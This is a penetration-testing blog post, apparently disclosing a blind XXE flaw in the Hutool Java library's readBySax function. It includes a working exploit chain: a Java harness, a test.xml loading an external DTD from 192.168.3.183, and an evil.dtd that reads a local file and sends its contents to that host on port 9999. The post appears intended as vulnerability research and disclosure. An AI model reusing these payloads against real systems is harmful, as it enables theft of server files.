<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hutool-XXE | FBD的渗透博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Hutool is a small but comprehensive library of Java tools. A blind XXE vulnerability exists in its XML parsing module before v5.8.19, which may lead to arbitrary file reading.  PositionThis vulnerabil">
<meta property="og:type" content="article">
<meta property="og:title" content="Hutool-XXE">
<meta property="og:url" content="https://fbdhhhh47.github.io/2023/06/06/hutool-XXE/index.html">
<meta property="og:site_name" content="FBD的渗透博客">
<meta property="og:description" content="Hutool is a small but comprehensive library of Java tools. A blind XXE vulnerability exists in its XML parsing module before v5.8.19, which may lead to arbitrary file reading.  PositionThis vulnerabil">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2023/06/06/pCiteYD.md.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/06/06/pCitZFO.md.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/06/06/pCitETK.png">
<meta property="article:published_time" content="2023-06-06T12:59:44.000Z">
<meta property="article:modified_time" content="2023-06-06T14:03:06.050Z">
<meta property="article:author" content="FBDhhhh">
<meta property="article:tag" content="XXE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2023/06/06/pCiteYD.md.png">
  
    <link rel="alternate" href="/atom.xml" title="FBD的渗透博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">FBD的渗透博客</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS 订阅"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="搜索"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://fbdhhhh47.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="hutool-hutool-XXE" class="h-entry article article-type-hutool" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/06/06/hutool-XXE/" class="article-date">
  <time class="dt-published" datetime="2023-06-06T12:59:44.000Z" itemprop="datePublished">2023-06-06</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Hutool-XXE
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><strong>Hutool</strong> is a small but comprehensive library of Java tools. A blind XXE vulnerability exists in its XML parsing module before v5.8.19, which may lead to arbitrary file reading. </p>
<h2 id="Position"><a href="#Position" class="headerlink" title="Position"></a>Position</h2><p>This vulnerability sources from the <strong>readBySax</strong> function in <strong>XmlUtil.java</strong>, which uses the SAXParserFactory and is by default susceptible to XXE attacks.</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">readBySax</span><span class="params">(InputSource source, ContentHandler contentHandler)</span> &#123;</span><br><span class="line">		<span class="comment">// 1.获取解析工厂</span></span><br><span class="line">		<span class="keyword">if</span> (<span class="literal">null</span> == factory) &#123;</span><br><span class="line">			factory = SAXParserFactory.newInstance();</span><br><span class="line">			factory.setValidating(<span class="literal">false</span>);</span><br><span class="line">			factory.setNamespaceAware(namespaceAware);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="comment">// 2.从解析工厂获取解析器</span></span><br><span class="line">		<span class="keyword">final</span> SAXParser parse;</span><br><span class="line">		XMLReader reader;</span><br><span class="line">		<span class="keyword">try</span> &#123;</span><br><span class="line">			parse = factory.newSAXParser();</span><br><span class="line">            ...</span><br></pre></td></tr></table></figure>

<h3 id="Xxploitation"><a href="#Xxploitation" class="headerlink" title="Xxploitation"></a>Xxploitation</h3><p>First you need to parse an XML which lead to a malicious external DTD:</p>
<p>xxeTest.java:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> cn.hutool.core;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> cn.hutool.core.collection.CollUtil;</span><br><span class="line"><span class="keyword">import</span> cn.hutool.core.io.resource.ResourceUtil;</span><br><span class="line"><span class="keyword">import</span> cn.hutool.core.util.XmlUtil;</span><br><span class="line"><span class="keyword">import</span> org.xml.sax.helpers.DefaultHandler;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.HashSet;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">xxeTest</span> &#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span>&#123;</span><br><span class="line">		<span class="keyword">final</span> HashSet&lt;String&gt; eles = CollUtil.newHashSet(</span><br><span class="line">			<span class="string">&quot;returnssms&quot;</span>, <span class="string">&quot;returnstatus&quot;</span>, <span class="string">&quot;message&quot;</span>, <span class="string">&quot;remainpoint&quot;</span>, <span class="string">&quot;teskID&quot;</span>, <span class="string">&quot;successCounts&quot;</span>);</span><br><span class="line">		XmlUtil.readBySax(ResourceUtil.getStream(<span class="string">&quot;C:\\Users\\vanya\\Documents\\GitHub\\hutool\\hutool-core\\src\\main\\java\\cn\\hutool\\core\\test.xml&quot;</span>), <span class="keyword">new</span> <span class="title class_">DefaultHandler</span>());</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>test.xml:</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span> ?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">foo</span> [ <span class="meta">&lt;!ENTITY % <span class="keyword">xxe</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;http://192.168.3.183/evil.dtd&quot;</span>&gt;</span> %xxe; ]&gt;</span></span><br></pre></td></tr></table></figure>

<p>The malicious external DTD can be fetched through the HTTP server we deployed on 192.168.3.183:80.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 80</span><br></pre></td></tr></table></figure>

<p>Since the XmlUtil.java does not echo back to our parsing (which is called Blind XXE), the DTD reads arbitrary file through another HTTP request.</p>
<p>evil.dtd:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % file SYSTEM &quot;file:///g:/test.txt&quot;&gt;</span><br><span class="line">&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; exfil SYSTEM &#x27;http://192.168.3.183:9999/?x=%file;&#x27;&gt;&quot;&gt;</span><br><span class="line">%eval;</span><br><span class="line">%exfil;</span><br></pre></td></tr></table></figure>

<p>Absolutely  we need to use netcat for port listening on 9999, we run xxeTest.java and it comes firstly the   request for evil.dtd then the request which contains the text we read from G:&#x2F;test.txt:</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCiteYD"><img src="https://s1.ax1x.com/2023/06/06/pCiteYD.md.png" alt="pCiteYD.md.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCitZFO"><img src="https://s1.ax1x.com/2023/06/06/pCitZFO.md.png" alt="pCitZFO.md.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCitETK"><img src="https://s1.ax1x.com/2023/06/06/pCitETK.png" alt="pCitETK.png"></a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://fbdhhhh47.github.io/2023/06/06/hutool-XXE/" data-id="clikcv1hk0000i06rb5ao3gv5" data-title="Hutool-XXE" class="article-share-link"><span class="fa fa-share">分享</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/XXE/" rel="tag">XXE</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2023/06/05/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/XXE/" rel="tag">XXE</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/XXE/" style="font-size: 10px;">XXE</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/06/">六月 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/06/06/hutool-XXE/">Hutool-XXE</a>
          </li>
        
          <li>
            <a href="/2023/06/05/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 FBDhhhh<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>